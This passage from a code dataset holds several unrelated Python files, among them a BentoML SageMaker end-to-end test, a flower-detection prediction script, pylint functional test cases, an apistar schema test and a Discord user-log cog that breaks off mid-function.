result.stdout.decode('utf-8'))\n            if expect_result == result.stdout.decode('utf-8'):\n                deployment_failed = False\n            else:\n                deployment_failed = True\n            logger.info(\n                f\"Did deployment fail? {deployment_failed} \"\n                f\"Actual result '{result.stdout.decode('utf-8')}', and expect \"\n                f\"result '{expect_result}'\"\n            )\n    except Exception as e:\n        logger.error(str(e))\n        deployment_failed = True\n\n    return deployment_failed\n\n\ndef delete_deployment(deployment_name):\n    logger.info('Delete test deployment with BentoML CLI')\n    delete_deployment_command = [\n        'bentoml',\n        'sagemaker',\n        'delete',\n        deployment_name,\n        '--force',\n    ]\n    logger.info(f'Delete command: {delete_deployment_command}')\n    with subprocess.Popen(\n        delete_deployment_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n    ) as proc:\n        delete_deployment_stdout = proc.stdout.read().decode('utf-8')\n        logger.info(delete_deployment_stdout)\n\n\nclass TestDeploymentService(BentoService):\n    @api(DataframeHandler)\n    def predict(self, df):\n        return 1\n\n    @api(DataframeHandler)\n    def classify(self, df):\n        return 'cat'\n\n\nclass UpdatedTestDeploymentService(BentoService):\n    @api(DataframeHandler)\n    def predict(self, df):\n        return 1\n\n    @api(DataframeHandler)\n    def classify(self, df):\n        # change result from cat to dog\n        return 'dog'\n\n\nif __name__ == '__main__':\n    deployment_failed = False\n    random_hash = uuid.uuid4().hex[:6]\n    deployment_name = f'tests-sagemaker-update-e2e-{random_hash}'\n    region = 'us-west-2'\n\n    logger.info('Creating version one BentoService bundle..')\n    service_ver_one = TestDeploymentService()\n    saved_path = service_ver_one.save()\n\n    loaded_ver_one_service = load(saved_path)\n    bento_name = f'{loaded_ver_one_service.name}:{loaded_ver_one_service.version}'\n    create_deployment_command = [\n        'bentoml',\n        'sagemaker',\n        'deploy',\n        deployment_name,\n        '-b',\n        bento_name,\n        '--api-name',\n        'classify',\n        '--verbose',\n    ]\n    deployment_failed, endpoint_name = run_sagemaker_create_or_update_command(\n        create_deployment_command\n    )\n\n    if not deployment_failed and endpoint_name:\n        deployment_failed = 
test_deployment_result(endpoint_name, '\"cat\"\\n')\n else:\n deployment_failed = True\n logger.info('Deployment failed for creating deployment')\n\n # if not deployment_failed:\n # logger.info('UPDATED ENV FOR DEPLOYMENT')\n # update_deployment_command = [\n # 'bentoml',\n # 'deploy',\n # 'update',\n # deployment_name,\n # '--api-name',\n # 'predict',\n # '--verbose',\n # ]\n # deployment_failed, endpoint_name = run_sagemaker_create_or_update_command(\n # update_deployment_command\n # )\n # if not deployment_failed and endpoint_name:\n # deployment_failed = test_deployment_result(endpoint_name, '1\\n')\n # else:\n # logger.info(\n # 'Deployment failed for updating env without changing BentoService'\n # )\n\n if not deployment_failed:\n\n logger.info('UPDATED NEW BENTO FOR DEPLOYMENT')\n service_ver_two = UpdatedTestDeploymentService()\n saved_path = service_ver_two.save()\n\n loaded_ver_two_service = load(saved_path)\n bento_name = f'{loaded_ver_two_service.name}:{loaded_ver_two_service.version}'\n\n update_bento_version_deployment_command = [\n 'bentoml',\n 'sagemaker',\n 'update',\n deployment_name,\n '-b',\n bento_name,\n '--wait',\n '--verbose',\n ]\n deployment_failed, endpoint_name = run_sagemaker_create_or_update_command(\n update_bento_version_deployment_command\n )\n if not deployment_failed and endpoint_name:\n deployment_failed = test_deployment_result(endpoint_name, '\"dog\"\\n')\n else:\n logger.info('Deployment failed for updating BentoService')\n\n delete_deployment(deployment_name)\n\n logger.info('Finished')\n if deployment_failed:\n logger.info(\n 'E2E update sagemaker deployment failed, fix the issues before releasing'\n )\n else:\n logger.info('E2E Sagemaker update deployment testing is successful')\n","sub_path":"scripts/e2e_tests/aws_sagemaker/e2e_sagemaker_update_deployment.py","file_name":"e2e_sagemaker_update_deployment.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"76191147","text":"class Solution(object):\n def decodeString(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n # recursion: DFS\n # DFS need to return two:\n # 1. for the content within []\n # 2. 
the index of ]\n        return self.DFS(s, 0)[0]\n\n    def DFS(self, s, j):\n        # return (res, j) where j is the last ] position\n        # start is the start index within []\n        if not s:\n            return (\"\", j)\n        start = j # the start may not necessarily be a number\n        res = \"\"\n        while j < len(s):\n            if s[j] == \"[\":\n                cnt = int(s[start:j]) # the front of [ must be a number\n                ss, j = self.DFS(s, j + 1)\n                start = j+1\n                res += cnt * ss\n            elif s[j] == \"]\": # end of this level, break\n                break\n            elif s[j].isdigit():\n                if not s[start].isdigit(): # the start may not necessarily be a number\n                    start = j\n            else:\n                res += s[j]\n            j += 1\n        return res, j","sub_path":"394_decode_string/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"409138377","text":"import sqlite3 as lite\nfrom miniworldmaker import *\nimport easygui\n\n\nclass MyBoard(TiledBoard):\n\n    def __init__(self, **kwargs):\n        super().__init__(rows=12, columns=12, tile_size=40)\n        self.register_token_type(Robot)\n        self.register_token_type(Wall)\n        self.register_token_type(Gold)\n        self.register_token_type(Diamond)\n        self.register_token_type(Emerald)\n        self.create_world_toolbar = SelectTokenTypeToolbar(self)\n        self.create_world_toolbar.add_widget(SaveButton(\"db_files/ctw_db.db\", self, \"Save\"))\n        self.create_world_toolbar.add_widget(LoadButton(\"db_files/ctw_db.db\", self, \"Load\", ))\n        self._window.add_container(self.create_world_toolbar, \"right\")\n        self.event_console = EventConsole()\n        self.event_console.register_events = {\"all\"}\n        self._window.add_container(self.event_console, \"right\", size=500)\n        self.add_image(path=\"images/stone.jpg\")\n\n    def get_event(self, event, data):\n        if event == \"mouse_left\":\n            position = self.get_board_position_from_pixel(data)\n            actor = self.add_to_board(self.create_world_toolbar.selected_actor(), position=position)\n        elif event == \"mouse_right\":\n            position = self.get_board_position_from_pixel(data)\n            self.remove_tokens_in_area(position)\n\n\nclass Robot(Actor):\n    def __init__(self):\n        super().__init__()\n        self.add_image(\"images/robo_green.png\")\n\n\nclass Wall(Token):\n    def __init__(self):\n        super().__init__()\n        self.add_image(\"images/rock.png\")\n\n\nclass Gold(Token):\n    def __init__(self):\n        super().__init__()\n        self.add_image(\"images/stone_gold.png\")\n\n\nclass Diamond(Token):\n    def __init__(self):\n        super().__init__()\n        self.add_image(\"images/stone_blue.png\",)\n\n\nclass Emerald(Token):\n    def __init__(self):\n        super().__init__()\n        self.add_image(\"images/stone_green.png\")\n\n\nmy_board = MyBoard()\nmy_board.show()\n","sub_path":"examples/robot/create_robot_world.py","file_name":"create_robot_world.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"234981780","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 28 14:52:26 2018\n\n@author: dat\n\"\"\"\n\nimport utility\nimport numpy as np\nimport cloudpickle as pickle\nfrom scipy import misc\nimport copy\nimport imageio\nimport os\nimport time\nfrom datetime import timedelta\nimport dim2_keras as dim\n\n\n\"\"\"\nhyper-parameters\n\"\"\"\nlearning_rate = [0.1, 0.01, 0.001, 0.0001] #parameter used in gradient descent optimization\nepochs_schedule = [30, 30, 30, 30] #how many times to go over the training obs during optimizing\nregularizer = 0.0001 #?\ntarget_shape = [64, 64] # the size of the patches given to the 
network\nbatch_size = 128 #the number of training obs to use at once\n\n\"\"\"\ndata\n\"\"\"\n\ntest_images = np.load('../data/test.npy')\ntest_annotation = '../data/test_2class_annotation.txt'\n\n\"\"\"\nGet W_max_t and H_max_t for buffer\n\"\"\"\n# load window size configuration\nfid = open('../data/set1_annotation.pickle','rb')\ndata_tmp = pickle.load(fid)\nfid.close()\nH_max_t = data_tmp['H_max'] #the biggest bounding box in the training and validation annotations\nW_max_t = data_tmp['W_max']\n \nx_start=int(0+H_max_t*0.5)\nx_stop=int(3420-225-H_max_t*0.5)\ny_start=int(0+W_max_t*0.5)\ny_stop=int(6080-W_max_t*0.5)\n\n\"\"\"\nSome needed functions\n\"\"\"\n\ndef make_all_f(ann):\n ann2=copy.deepcopy(ann)\n ann3=[]\n for box in ann2:\n if box[-1]!='NA':\n box=(box[0],'F')\n ann3.append(box)\n return ann3\n\ndef calculate_minibox(filename): \n fid = open(filename,'r')\n content = fid.read().split('\\n')[1:-1]\n fid.close()\n minibox = 3420*6080\n \n for index, row in enumerate(content):\n name, id, y, x, width , height, label = row.split(',')\n x, y, width, height = int(x), int(y), int(width), int(height)\n xmin = x\n xmax = x+height\n ymin = y\n ymax = y+width\n area = (xmax-xmin+1)*(ymax-ymin+1)\n \n if label!='NA' and area < minibox:\n minibox = area\n \n return minibox\n\ndef mean_iou(iou_mat):\n rows = []\n for row in iou_mat:\n row = [x for x in row if x>0]\n if len(row)>0:\n rows.append(sum(row)/len(row))\n else:\n rows.append(0)\n return rows\n\n\n\"\"\"\nCalculate minimum area threshold for predicted bounding boxes\n\"\"\"\nminibox1 = calculate_minibox('../data/Dryas2_sub.txt')\nminibox2 = calculate_minibox('../data/NARS.txt')\nminibox = min(minibox1,minibox2)\n\n\n\"\"\"\nsetup\n\"\"\"\n#model = md.get_flower_model((target_shape[0],target_shape[1],3), 2) #initial model\nmodel =dim.dim2_model((target_shape[0],target_shape[1],3),2)\ncurrent_weights = model.get_weights()\n\n#fid = open('./result/model_2class_dat.pickle','rb')\nfid = open('../result/model_2class_dim_keras.pickle','rb')\nmodel_data = pickle.load(fid)\nfid.close()\nmodel.set_weights(model_data['weights'])\n\ndef generate_flower_mask(im):\n H,W,_ = im.shape\n im = misc.imresize(im, (int(H*0.1), int(W*0.1)), interp='lanczos')\n H_resize, W_resize,_ = im.shape\n kernels = (45,55,65,75) \n outputs = np.zeros((4, H, W), dtype='uint8') #4=the number of kernels to try\n \n for index, kernel in enumerate(kernels):\n val_gen1, h_steps1, w_steps1 = utility.get_test_generator_scale(im,stride=5,target_shape=[64,64],window=[kernel,kernel])\n prediction = model.predict_generator(val_gen1,h_steps1*w_steps1)[:,0]\n prediction = np.reshape(prediction, (h_steps1,w_steps1))\n outputs[index] = misc.imresize(prediction, (H,W), interp = 'lanczos')/255\n outputs = np.sum(outputs, axis=0)/4\n outputs = np.clip(outputs, 0, 1).astype(float)\n outputs2={'F':outputs}\n return outputs2\n\n\n\"\"\"\nGenerate box predictions\n\"\"\"\nfilenames = os.listdir('../data/test_orig/')\nfilenames.sort()\n\noutput_mask_path = '../result/Final boxes'\nprob_th=0.1\n\ngt = {'dryas0.JPG': [([0,0,0,0],'X'),([0,0,0,0],'X')]}\noutput = []\nmAP = []\nno_detection = 0\nno_misdetection = 0\nno_false_positive = 0\nno_objects = 0\nno_images = 153\n\nfor idy, f in enumerate(filenames):\n test_filename=f\n test_path='../data/test_orig/'\n test_im = imageio.imread(test_path + test_filename)\n \n #Get annotations\n fid=open('../data/Dryas1_sub_buff_annotation.pickle','rb')\n test_ann = pickle.load(fid)[test_filename]\n fid.close()\n test_annotation1 = make_all_f(test_ann)\n 
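\n    # Note: generate_flower_mask averages the sliding-window heat maps over\n    # four kernel sizes (45, 55, 65, 75 px) and clips to [0, 1] before thresholding.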
\n    #Generate mask with sliding window approach\n    start_time = time.time()\n    test_mask = generate_flower_mask(test_im)\n    end_time = time.time()\n    time_dif = end_time - start_time\n    # Print the time-usage.\n    print(\"Time elapsed: \" + str(timedelta(seconds=int(round(time_dif)))))\n    \n    misc.imsave(output_mask_path + '/mask_' + test_filename, test_mask['F'])\n    \n    #Calculate mAP score\n    p_th = [0.1*i for i in range(1,10)]\n    iou_th = [0.1*i for i in range(1,5)]\n    AP = utility.evaluate_ap_score(test_annotation1,test_mask,p_th,iou_th,min_box=minibox,buffer=[x_start,x_stop,y_start,y_stop])\n    mAP.append(sum(AP['F'])/len(AP['F']))\n    \n    #Create bb predictions from the mask\n    pred_boxes = utility.generate_box_prediction_nms(test_mask, 'F', threshold=prob_th, minbox=minibox, buffer=[x_start,x_stop,y_start,y_stop])\n    \n    #Save image with predictions and ground truth\n    pic = utility.im_with_boxes(test_annotation1,pred_boxes,test_im,output_mask_path+'/'+test_filename,thickness=25,buffer=[x_start,x_stop,y_start,y_stop])\n    \n    #Evaluate predictions\n    eval_result = utility.evaluate(pred_boxes, test_annotation1)\n    no_detection += eval_result[0]\n    no_misdetection += eval_result[1]\n    no_false_positive += eval_result[2]\n    no_objects += eval_result[3]\n    \n    #Check out the annotation with biggest overlap with predicted box\n    #i.e. generating ground truths for the predicted boxes\n    iom_scores = utility.generate_iom(pred_boxes, test_annotation1, 'F')\n    boxes = []\n    for idx, box in enumerate(iom_scores):\n        xmin,xmax,ymin,ymax = pred_boxes[idx][0]\n        xmin = int(0.1*xmin)\n        xmax = int(0.1*xmax)\n        ymin = int(0.1*ymin)\n        ymax = int(0.1*ymax)\n        \n        if sum(box)>0.3:\n            place = max(enumerate(box), key=lambda x: x[1])[0]\n            boxes.append((pred_boxes[idx][0], test_ann[place][-1]))\n            output.append(str(idy) + ',' + str(xmin) +',' + str(xmax) + \\\n                          ',' + str(ymin) + ',' + str(ymax) +',' + \\\n                          test_ann[place][-1] + '\\n')\n        else:\n            boxes.append((pred_boxes[idx][0], 'X'))\n            output.append(str(idy) + ',' + str(xmin) +',' + str(xmax) + \\\n                          ',' + str(ymin) + ',' + str(ymax) +',' + \\\n                          'X' + '\\n')\n    \n    gt[test_filename]=boxes\n    \n\n\nfid=open('../result/dim2_keras_boxes.pickle','wb')\npickle.dump(gt,fid)\nfid.close()\n\nfid=open('../result/dim2_keras_boxes.txt','w')\nfor row in output:\n    fid.write(row)\nfid.close()\n\nstatistics = {'mAP':mAP}\nstatistics['no_detection']=no_detection\nstatistics['no_misdetection']=no_misdetection\nstatistics['no_false_positive']=no_false_positive\nstatistics['no_objects']=no_objects\nstatistics['no_images']=no_images\nstatistics['miss_rate']=no_misdetection/float(no_objects)\nstatistics['FPPI']=no_false_positive/float(no_images)\n\nfid=open('../result/dim2_keras_statistics.pickle','wb')\npickle.dump(statistics,fid)\nfid.close()\n","sub_path":"Training models/predict_bounding_boxes.py","file_name":"predict_bounding_boxes.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182926749","text":"from celery_daemon_task.core.task import DaemonTask\n\nimport datetime\nimport time\n\n\n__author__ = 'nick'\n\n\nclass MockDaemonTask(DaemonTask):\n\ttask_loop_delay = datetime.timedelta(seconds=2)\n\tmax_iterations = 2\n\n\tnum_executions = 0\n\n\tdef task(self, *args, **kwargs):\n\t\tself.logger.info('Running task')\n\t\tself.num_executions += 1\n\n\ndef test_daemon_start():\n\t\"\"\"Tests that a basic daemon task can be started asynchronously\"\"\"\n\ttask = MockDaemonTask()\n\n\tstart_time = 
time.time()\n\n\ttask.start().join()\n\n\tassert time.time() - start_time >= task.max_iterations * task.task_loop_delay.total_seconds()\n\tassert task.num_executions == task.max_iterations\n\ndef test_daemon_run_daemon():\n\t\"\"\"Tests that a basic daemon task can run in the foreground\"\"\"\n\ttask = MockDaemonTask()\n\n\tstart_time = time.time()\n\n\ttask._run_daemon()\n\n\tassert time.time() - start_time >= task.max_iterations * task.task_loop_delay.total_seconds()\n\tassert task.num_executions == task.max_iterations","sub_path":"tests/task_tests.py","file_name":"task_tests.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"625249815","text":"#pylint: disable=missing-docstring, no-else-return, invalid-name, unused-variable, superfluous-parens, try-except-raise\n\"\"\"Testing inconsistent returns\"\"\"\nimport math\nimport sys\n\n# These ones are consistent\ndef explicit_returns(var):\n if var >= 0:\n return math.sqrt(var)\n else:\n return None\n\ndef explicit_returns2(var):\n if var < 0:\n return None\n return math.sqrt(var)\n\ndef empty_implicit_returns(var):\n if var < 0:\n return\n\ndef returns_in_exceptions():\n try:\n raise ValueError('test')\n except ValueError:\n return 1\n except (OSError, TypeError):\n return 2\n\ndef returns_and_exceptions(var):\n if var < 10:\n return var**2\n else:\n raise ValueError(\"Incorrect value\")\n\ndef returns_and_exceptions_issue1770(var):\n try:\n if var == 1:\n return 'a'\n elif var == 2:\n return 'b'\n else:\n raise ValueError\n except AssertionError:\n return None\n\ndef explicit_returns3(arg):\n if arg:\n return False\n else:\n if arg < 3:\n print('arg < 3')\n return True\n\ndef explicit_returns4(arg):\n if arg:\n if arg > 2:\n print('arg > 2')\n return False\n else:\n if arg < 3:\n print('arg < 3')\n return True\n\ndef explicit_returns5(arg):\n if arg:\n if arg > 2:\n print('arg > 2')\n return False\n else:\n return True\n\ndef nested_function():\n def dummy_return():\n return True\n return dummy_return\n\ndef explicit_returns6(x, y, z):\n if x: # pylint: disable=no-else-return\n a = 1\n if y: # pylint: disable=no-else-return\n b = 2\n return y\n else:\n c = 3\n return x\n else:\n d = 4\n return z\n\ndef explicit_returns7(arg):\n if arg < 0:\n arg = 2 * arg\n return 'below 0'\n elif arg == 0:\n print(\"Null arg\")\n return '0'\n else:\n arg = 3 * arg\n return 'above 0'\n\ndef bug_1772():\n \"\"\"Don't check inconsistent return statements inside while loop\"\"\"\n counter = 1\n while True:\n counter += 1\n if counter == 100:\n return 7\n\ndef bug_1771(var):\n if var == 1:\n sys.exit(1)\n else:\n return var * 2\n\ndef bug_1771_with_user_config(var):\n # sys.getdefaultencoding is considered as a never\n # returning function in the inconsistent_returns.rc file.\n if var == 1:\n sys.getdefaultencoding()\n else:\n return var * 2\n\ndef bug_1794_inner_func_in_if(var):\n # pylint: disable = no-else-return,useless-return\n if var:\n def _inner():\n return None\n return None\n else:\n return None\n\ntry:\n import ConfigParser as configparser\nexcept ImportError:\n import configparser\n\n# Due to the try/except import above, astroid cannot safely\n# infer the exception type. It doesn't matter here, because\n# as the raise statement is not inside a try/except one, there\n# is no need to infer the exception type. 
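The raise ends the\n# function's final code path regardless of the exception class. 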
It is just an exception\n# that is raised.\ndef bug_1794(a):\n for x in range(a):\n if x == 100:\n return a\n raise configparser.NoSectionError('toto')\n\n#pylint: disable = no-else-return\ndef bug_1782_bis(val=3):\n if val == 3:\n while True:\n break\n return True\n else:\n raise RuntimeError()\n\n# Next ones are not consistent\ndef explicit_implicit_returns(var): # [inconsistent-return-statements]\n if var >= 0:\n return math.sqrt(var)\n\ndef empty_explicit_returns(var): # [inconsistent-return-statements]\n if var < 0:\n return\n return math.sqrt(var)\n\ndef explicit_implicit_returns2(arg): # [inconsistent-return-statements]\n if arg:\n if arg > 2:\n print('arg > 2')\n return False\n else:\n return True\n\ndef explicit_implicit_returns3(arg): # [inconsistent-return-statements]\n if arg:\n if arg > 2:\n print('arg > 2')\n return False\n else:\n return True\n\ndef returns_missing_in_catched_exceptions(arg): # [inconsistent-return-statements]\n try:\n arg = arg**2\n raise ValueError('test')\n except ValueError:\n print('ValueError')\n arg = 0\n except (OSError, TypeError):\n return 2\n\ndef complex_func(arg): # [inconsistent-return-statements]\n for i in range(arg):\n if i > arg / 2:\n break\n else:\n return arg\n\ndef inconsistent_returns_in_nested_function():\n def not_consistent_returns_inner(arg): # [inconsistent-return-statements]\n for i in range(arg):\n if i > arg / 2:\n break\n else:\n return arg\n return not_consistent_returns_inner\n\ndef bug_1771_counter_example(var): # [inconsistent-return-statements]\n if var == 1:\n inconsistent_returns_in_nested_function()\n else:\n return var * 2\n\nclass BlargException(Exception):\n pass\n\n\ndef blarg(someval):\n try:\n if someval:\n raise BlargException()\n return 5\n except BlargException:\n raise\n\ndef bug_1772_counter_example(): # [inconsistent-return-statements]\n counter = 1\n if counter == 1:\n while True:\n counter += 1\n if counter == 100:\n return 7\n\ndef bug_1794_inner_func_in_if_counter_example_1(var): # [inconsistent-return-statements]\n # pylint: disable = no-else-return,useless-return\n if var:\n def _inner():\n return None\n return None\n else:\n return\n\ndef bug_1794_inner_func_in_if_counter_example_2(var): # [inconsistent-return-statements]\n # pylint: disable = no-else-return,useless-return\n if var:\n def _inner():\n return\n return None\n else:\n return\n\ndef bug_1794_inner_func_in_if_counter_example_3(var): # [inconsistent-return-statements]\n # pylint: disable = no-else-return,useless-return\n if var:\n def _inner():\n return None\n return None\n else:\n def _inner2(var_bis): # [inconsistent-return-statements]\n if var_bis:\n return True\n return\n","sub_path":".venv/lib/python3.7/site-packages/pylint/test/functional/inconsistent_returns.py","file_name":"inconsistent_returns.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"505825074","text":"from typing import List\n\nfrom apistar import App, Route, TestClient, schema\n\n\nclass KittenName(schema.String):\n max_length = 100\n\n\nclass KittenColor(schema.Enum):\n enum = [\n 'black',\n 'brown',\n 'white',\n 'grey',\n 'tabby'\n ]\n\n\nclass Kitten(schema.Object):\n properties = {\n 'name': KittenName,\n 'color': KittenColor,\n 'cuteness': schema.Number(\n minimum=0.0,\n maximum=10.0,\n multiple_of=0.1\n )\n }\n\n\ndef list_favorite_kittens(color: KittenColor) -> List[Kitten]:\n \"\"\"\n List your favorite kittens, optionally filtered by color.\n \"\"\"\n kittens = 
[\n Kitten({'name': 'fluffums', 'color': 'white', 'cuteness': 9.8}),\n Kitten({'name': 'tabitha', 'color': 'tabby', 'cuteness': 8.7}),\n Kitten({'name': 'meowster', 'color': 'white', 'cuteness': 7.8}),\n Kitten({'name': 'fuzzball', 'color': 'brown', 'cuteness': 8.0}),\n ]\n return [\n kitten for kitten in kittens\n if kitten['color'] == color\n ]\n\n\ndef add_favorite_kitten(name: KittenName) -> Kitten:\n \"\"\"\n Add a kitten to your favorites list.\n \"\"\"\n return Kitten({'name': name, 'color': 'black', 'cuteness': 0.0})\n\n\napp = App(routes=[\n Route('/list_favorite_kittens/', 'GET', list_favorite_kittens),\n Route('/add_favorite_kitten/', 'POST', add_favorite_kitten),\n])\n\n\nclient = TestClient(app)\n\n\ndef test_list_kittens():\n response = client.get('/list_favorite_kittens/?color=white')\n assert response.status_code == 200\n assert response.json() == [\n {'name': 'fluffums', 'color': 'white', 'cuteness': 9.8},\n {'name': 'meowster', 'color': 'white', 'cuteness': 7.8}\n ]\n\n\ndef test_add_kitten():\n response = client.post('/add_favorite_kitten/', data={'name': 'charlie'})\n assert response.status_code == 200\n assert response.json() == {\n 'name': 'charlie', 'color': 'black', 'cuteness': 0.0\n }\n\n\ndef test_invalid_list_kittens():\n response = client.get('/list_favorite_kittens/?color=invalid')\n assert response.status_code == 400\n assert response.json() == {\n 'color': 'Must be a valid choice.'\n }\n","sub_path":"tests/schema/test_schema.py","file_name":"test_schema.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"224009734","text":"#-------------------------------------------------------------------------------\n# Name: module1\n# Purpose:\n#\n# Author: pbarkley\n#\n# Created: 26/03/2015\n# Copyright: (c) pbarkley 2015\n# Licence: \n#-------------------------------------------------------------------------------\nfrom Sniv import Sniv\n#from Schedule import Schedule\nfrom datetime import timedelta\n\n\nclass Wave(object):\n\n def __init__(self, id):\n self.id = id\n self.begin = None #a datetime giving the date and time for the start of the wave\n self.end = None\n self.priority = 1.0\n self.times = {}\n self.times[\"Plane\"] = Sniv()\n self.times[\"Flyer\"] = Sniv()\n self.times[\"Student\"] = self.times[\"Flyer\"]\n self.times[\"Instructor\"] = self.times[\"Flyer\"]\n self.studentMultiple = 1 #Allows double or triple waves\n self.schedule = None\n self.night_time = 0.0 # Hours of night in wave (float)\n self.day_time = 0.0 # Hours of day in wave (float)\n self._canFollow = []\n \"\"\" self._canFollow includes itself, so for an out-and-in the student can have\n sequential events that can follow immediately both in the same wave\"\"\"\n self._canFollowCalculated = False\n self.crewRestHours = 12 #Max time between first brief and last debrief\n self.tags = set()\n self._tier = None\n self.fudge = 0.0\n\n def __str__(self):\n return \"Wave_\" + str(self.id)\n\n # Returns the set of waves that a student could be scheduled for and still make this one\n def canImmediatelyFollow(self):\n sked = self.schedule\n if sked != None and not self._canFollowCalculated:\n for w in sked.waves:\n wave = sked.waves[w]\n if (wave.times[\"Flyer\"].end <= self.times[\"Flyer\"].begin):\n self._canFollow.append(w)\n self._canFollowCalculated = True\n return self._canFollow\n\n def first(self):\n self.canImmediatelyFollow()\n if len(self._canFollow) > 0:\n return False\n else:\n return True\n\n 
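# Duration of the Plane sniv in hours, minus the fudge correction.\n    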
def planeHours(self):\n diff = self.times[\"Plane\"].end - self.times[\"Plane\"].begin\n h = diff.seconds/3600.0\n \"\"\"if h >= 2.0:\n fudge = 0.2\"\"\"\n return h - self.fudge\n\n # Future work: fix canImmediatelyFollow to return min(tier + 1) across any events it can follow else 0\n def tier(self):\n if self._tier is None:\n possible_tiers = []\n for w in self.schedule.waves.values():\n if w.times[\"Flyer\"].end <= self.times[\"Flyer\"].begin:\n possible_tiers.append(w.tier() + 1)\n if possible_tiers:\n self._tier = min(possible_tiers)\n else:\n self._tier = 0\n return self._tier\n\n\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()\n","sub_path":"Wave.py","file_name":"Wave.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621397053","text":"liste = []\ndef countRank(scores, i):\n count = 0\n rank = 0\n for j in scores:\n if j not in liste:\n liste.append(j)\n count += 1\n if j == i:\n rank = count\n liste.clear()\n return rank\n\n\ndef climbingLeaderboard(scores, alice):\n total_ranks = []\n for i in alice:\n scores.append(i)\n scores.sort(reverse=True)\n count_of_rank = countRank(scores, i)\n total_ranks.append(str(count_of_rank))\n scores.remove(i)\n\n total_ranks = '\\n'.join(total_ranks)\n return print(total_ranks)\n\n\nscores_count = int(input('ScoresCount:'))\n\nscores = list(map(int, input('Scores: ').rstrip().split()))\n\nalice_count = int(input('AliceCount: '))\n\nalice = list(map(int, input('AliceScores: ').rstrip().split()))\n\nresult = climbingLeaderboard(scores, alice)\n\n\n\n","sub_path":"Odev3.py","file_name":"Odev3.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"321818876","text":"from datetime import datetime\nfrom os import system, chdir\n\n#start_time = datetime.now() \nnow = datetime.now()\nnow = str(now.year) +'-'+ f\"{now.month:02d}\" +'-'+ f\"{now.day:02d}\"\n# print(now)\nchdir('/home/opc/BCBCSVStorage/Warframe')\n# print('python WarframeScripts.py')\nsystem('python3 WarframeScripts.py')\n#print ('WarframeCSVtoTSV.py')\nsystem('python3 WarframeCSVtoTSV.py')\n# print('git add *')\nsystem('git add *')\n# print(\"git commit -m 'now'\")\nsystem('git commit -m \"' + now + '\"')\n# print('git push')\nsystem('git push')\n#end_time = datetime.now()\n#with open(\"execution.log\", \"w\") as text_file:\n# text_file.write('Duration: {}'.format(end_time - start_time))\n","sub_path":"Warframe/WarframeGitScriptsOracle.py","file_name":"WarframeGitScriptsOracle.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"285765675","text":"import datetime\nimport discord\n\nfrom redbot.core import checks, commands, Config\n\nfrom redbot.core.bot import Red\n\n__author__ = \"saurichable\"\n\n\nclass UserLog(commands.Cog):\n \"\"\"Log when users join/leave into your specified channel.\"\"\"\n\n __author__ = \"saurichable\"\n __version__ = \"1.0.3\"\n\n def __init__(self, bot: Red):\n self.bot = bot\n self.config = Config.get_conf(\n self, identifier=56546565165465456, force_registration=True\n )\n\n self.config.register_guild(channel=None, join=True, leave=True)\n\n @commands.group(autohelp=True)\n @commands.guild_only()\n @checks.admin_or_permissions(manage_guild=True)\n async def userlog(self, ctx):\n \"\"\"Manage user log settings.\"\"\"\n pass\n\n 
@userlog.command(name=\"channel\")\n    async def user_channel_log(self, ctx, channel: discord.TextChannel = None):\n        \"\"\"Set the channel for logs.\n\n        If the channel is not provided, logging will be disabled.\"\"\"\n        if channel:\n            await self.config.guild(ctx.guild).channel.set(channel.id)\n        else:\n            await self.config.guild(ctx.guild).channel.set(None)\n        await ctx.tick()\n\n    @userlog.command(name=\"join\")\n    async def user_join_log(self, ctx: commands.Context, on_off: bool = None):\n        \"\"\"Toggle logging when users join the current server.\n\n        If `on_off` is not provided, the state will be flipped.\"\"\"\n        # Compare against None explicitly so that an explicit False disables\n        # logging instead of flipping the current state.\n        target_state = (\n            on_off\n            if on_off is not None\n            else not (await self.config.guild(ctx.guild).join())\n        )\n        await self.config.guild(ctx.guild).join.set(target_state)\n        if target_state:\n            await ctx.send(\"Logging users joining is now enabled.\")\n        else:\n            await ctx.send(\"Logging users joining is now disabled.\")\n\n    @userlog.command(name=\"leave\")\n    async def user_leave_log(self, ctx: commands.Context, on_off: bool = None):\n        \"\"\"Toggle logging when users leave the current server.\n\n        If `on_off` is not provided, the state will be flipped.\"\"\"\n        target_state = (\n            on_off\n            if on_off is not None\n            else not (await self.config.guild(ctx.guild).leave())\n        )\n        await self.config.guild(ctx.guild).leave.set(target_state)\n        if target_state:\n            await ctx.send(\"Logging users leaving is now enabled.\")\n        else:\n            await ctx.send(\"Logging users leaving is now disabled.\")\n\n    @commands.Cog.listener()\n    async def on_member_join(self, member):\n        join = await self.config.guild(member.guild).join()\n        if not join:\n            return\n        channel = member.guild.get_channel(await self.config.guild(member.guild).channel())\n        if not channel:\n            return\n        time = datetime.datetime.utcnow()\n        users = len(member.guild.members)\n        since_created = (time - member.created_at).days\n        user_created = member.created_at.strftime(\"%Y-%m-%d, %H:%M\")\n\n        